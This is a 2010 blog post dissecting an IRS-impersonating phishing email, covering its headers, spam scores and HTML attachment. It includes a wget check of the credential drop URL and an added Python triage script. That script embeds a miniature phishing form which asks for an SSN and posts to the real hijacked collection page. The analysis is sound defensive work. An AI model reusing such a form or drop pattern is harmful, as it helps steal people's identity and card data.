Archive for September, 2010

Network Intrusion Recovery Redux

In my attempts to track down all sorts of citation-related minutia for a research grant, I came across this blog post:

http://saintaardvarkthecarpeted.com/blog/archive/2009/11/Sugar_Free_Jazz.html

that summarizes my talk at USENIX LISA last year. It’s a warm fuzzy feeling to know that people paid attention.


Mini-Dissection of IRS Phishing Spam

Four days ago I received an email from tax-refunds@irs.gov. A selection of interesting headers from the message appears below (sensitive information, such as my email address, elided). You’ll note two things. First, this email came to one of my U of C addresses, but it purports to be from the IRS. Why would the IRS (an American government agency) send a legitimate email to some random Canadian email address? (Yes, I’m a US citizen, but that’s beside the point — we’re playing the odds here, and certainly I have other valid US-based addresses the IRS could reach out to.) So: strike one. Second, the U of C spam filter correctly tagged this as spam (hence the {Spam?} prefix in the Subject header). Strike two. Finally, the IRS itself says that it does not request information via email: http://www.irs.gov/privacy/article/0,,id=179820,00.html. Strike three. But it gets better. The phisher keeps swinging for the fences.

Return-Path:
Received: from correo.ziv.es (correo.ziv.es [77.226.243.115]) by
forward.ucalgary.ca (Postfix) with ESMTP id 25CE038227 for
; Mon, 6 Sep 2010 19:10:26 -0600 (MDT)
thread-index: ActOKXOX06gLrg0bRziJn6dBptyFCg==
Received: from User ([60.32.171.42]) by correo.ziv.es with Microsoft
SMTPSVC(6.0.3790.3959); Tue, 7 Sep 2010 03:10:24 +0200
From:
Subject: {Spam?} IRS Annual Notification (ID: A20W852)
Date: Tue, 7 Sep 2010 03:10:32 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_009D_01C2A9A6.691CE492"
X-Priority: 3
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Message-ID:
To: undisclosed-recipients:;
X-Foo-MailScanner: Found to be clean
X-Foo-MailScanner-SpamCheck: spam, SpamAssassin (not cached,
score=11.622, required 6.2, autolearn=disabled, BAYES_99 5.50,
FORGED_MUA_OUTLOOK 3.12, FORGED_OUTLOOK_HTML 0.00, HTML_IMAGE_ONLY_20
1.55, HTML_MESSAGE 0.00, HTML_SHORT_LINK_IMG_3 0.00, MIME_HTML_ONLY 1.46)
X-Foo-MailScanner-SpamScore: sssssssssss
X-Foo-MailScanner-From: tax-refunds@irs.gov
X-Spam-Status: Yes

The headers indicate that someone connected to a Spanish ISP (I’m guessing from “correo” and .es) has fallen victim to a spambot using their Microsoft Outlook Express (or this could be forged information, but why include code for mailing in your bot when you can just ask the OS to ask an application to do it on your behalf?). Spanish citizens probably aren’t sending email on behalf of the IRS. Strike four.

This message contained some boilerplate legalese (“This message is intended only for the use of the individual…blah blah blah”) and an HTML attachment. The boilerplate language also contained the sentence: “Any views or opinions presented are solely those of the author and do not necessarily represent those of the company.” The IRS is an agency, not a company, and so this sentence doesn’t jibe. Strike five.

The HTML attachment was more interesting, although quite a basic attempt at phishing. I saved it to a file system and used the Unix `file` command to see the general format of what it might contain:

[locasto@xorenduex quarantine]$ file Refund_Payment_Form\(ID\ A20W852\).html
Refund_Payment_Form(ID A20W852).html: ASCII English text, with very long lines, with CRLF line terminators
[locasto@xorenduex quarantine]$

Using the Unix `more` command, I started to scroll through the file. Most of it appears to be a fairly standard scrape of a real IRS web page.

At line 324, however, we see an HTML table definition that contains a brief Javascript program starting at line 338 (immediately before this, the phisher attempts to close any other active script context with an “end” SCRIPT tag). The script is meant to check HTML form input before submission. It pops up Javascript alert boxes asking for a series of items. It starts by asking 3 times for your SSN, then requests your CVC/CVV2 (those short codes on the back of your credit card), your ATM signature, credit card expiration month and year, full name, billing address, home phone, date of birth (3X), mother’s maiden name, and name of your bank.

Places to enter this information appear in an HTML form defined immediately after this script. The target action of this form is to post the information the victim gives it to a PHP web page at hikinginn.com. The URL looks like some bulletin board or photo gallery: “/bbs/data/egallery/119701770/indexppl.php”. Presumably this page has been hijacked to contain code that accepts data from this phishing attempt. When I used wget to fetch this page, wget returned an HTTP 404 (Not Found) error, indicating that this page may well have been taken down.

[locasto@xorenduex quarantine]$ wget http://www.hikinginn.com/bbs/data/egallery/1197017760/indexppl.php
--10:54:55--  http://www.hikinginn.com/bbs/data/egallery/1197017760/indexppl.php
           => `indexppl.php'
Resolving www.hikinginn.com... 218.232.66.19
Connecting to www.hikinginn.com|218.232.66.19|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
10:54:56 ERROR 404: Not Found.

The web site itself is for a resort on the Korean island of Jeju.
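The two structural tells in the attachment, a stray closing SCRIPT tag followed by an inline script, and a form whose action posts somewhere other than the domain the message claims to come from, can be pulled out mechanically. The following triage script is an added example, not from the original post; its sample HTML is a constructed, stripped-down stand-in for the attachment that reuses only the form target URL quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the attachment: stray </script>, an inline
# "validation" script that raises a dialog, and a form posting off-site.
SAMPLE_HTML = """<html><body><h1>Refund Payment Form</h1>
</script>
<table><tr><td><script type="text/javascript">
function check(f){ if (!f.ssn.value) { alert("Please enter your SSN"); return false; } return true; }
</script></td></tr></table>
<form method="post" action="http://www.hikinginn.com/bbs/data/egallery/1197017760/indexppl.php" onsubmit="return check(this)">
<input name="ssn"><input type="submit" value="Continue">
</form></body></html>"""


class AttachmentTriage(HTMLParser):
    """Collect form action URLs and the text of every inline script block."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.script_blocks, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "script":
            self._in_script = True
            self.script_blocks.append("")

    def handle_endtag(self, tag):
        if tag == "script":          # a stray </script> is harmless here
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.script_blocks:
            self.script_blocks[-1] += data


def triage(html, claimed_domain):
    """Summarise where the form posts and how much dialog-driven script it carries."""
    p = AttachmentTriage()
    p.feed(html)
    offsite = [u for u in p.form_actions
               if not (urlparse(u).hostname or "").endswith(claimed_domain)]
    dialogs = sum(s.count("alert(") + s.count("prompt(") for s in p.script_blocks)
    return {"form_actions": p.form_actions, "offsite_actions": offsite,
            "script_blocks": len(p.script_blocks), "dialog_calls": dialogs}
```

A form in a message purporting to be from irs.gov that posts to a Korean resort's photo gallery is the whole story in one line of output.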

By the way, if you’re confused about what CVC/CVV2 is, then the phishing form helpfully asks: “Need help with CVC/CVV2?” and links this question text to: http://www.sti.nasa.gov/cvv.html
